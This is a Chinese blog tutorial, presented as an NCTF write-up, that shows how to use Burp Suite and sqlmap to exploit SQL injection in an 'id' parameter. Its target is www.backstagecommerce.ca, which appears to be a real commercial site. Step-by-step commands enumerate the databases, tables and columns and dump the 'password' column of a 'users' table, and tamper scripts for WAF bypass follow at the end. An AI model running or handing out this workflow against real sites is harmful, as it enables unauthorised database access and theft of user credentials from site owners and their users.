SQLMAP 脚本自动注入应用(burpsuit辅助)

一道nctf的注入题目
具体的步骤如下:
sqlmap注入命令1
sqlmap注入命令2

第一步 burpsuit获取报头

运用burpsuit抓包,获取http报头
SQLMAP 脚本自动注入应用(burpsuit辅助)_第1张图片

GET /services.php?id=4 HTTP/1.1
Host: www.backstagecommerce.ca
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: __cfduid=d8e66c3c7470ab2dae745171ba4dccd181469886263; _ga=GA1.2.1383706248.1469886265
Connection: close

第二步 报头存档

这一步将上面内容存在test.txt里面
SQLMAP 脚本自动注入应用(burpsuit辅助)_第2张图片

第三步 爆出现在使用的数据库

利用sqlmap,进行自动注入
执行语句

sqlmap.py -r "D:\sqlmapproject-sqlmap-be9381a\test.txt" -p id --dbs
//-p 跟的是参数这里为id  想要暴库就输入--dbs

利用这句代码报数据库内容

SQLMAP 脚本自动注入应用(burpsuit辅助)_第3张图片
爆出了数据库


或者利用下面代码爆出当前使用的数据库

sqlmap.py -r "D:\sqlmapproject-sqlmap-be9381a\test.txt" -p id --current-db

SQLMAP 脚本自动注入应用(burpsuit辅助)_第4张图片


当前使用的数据库为’db1052699_bsc’

第四步 爆出数据库中有用的数据表

利用下面语句爆数据库里的数据表

sqlmap.py -r "D:\sqlmapproject-sqlmap-be9381a\test.txt" -p id --tables -D "db1052699_bsc"

SQLMAP 脚本自动注入应用(burpsuit辅助)_第5张图片
看到了users的数据表,接下来下面就来爆字段啦

第五步 爆数据表中的字段

利用下面语句爆字段

sqlmap.py -r "D:\sqlmapproject-sqlmap-be9381a\test.txt" -p id --columns -T "users" -D "db1052699_bsc"

SQLMAP 脚本自动注入应用(burpsuit辅助)_第6张图片
看到了password字段,接下来就要爆内容啦

第六步 爆出有用字段的内容

最后一步爆字段内容

sqlmap.py -r "D:\sqlmapproject-sqlmap-be9381a\test.txt" -p id --dump -T "users" -D "db1052699_bsc" -C "password"

SQLMAP 脚本自动注入应用(burpsuit辅助)_第7张图片
密码被爆破出来啦

--bacth自动化
--tamper=charencode.py,modsecurityversioned.py,randomcase.py,space2morehash.py,varnish.py加入绕过

你可能感兴趣的:(WEB漏洞)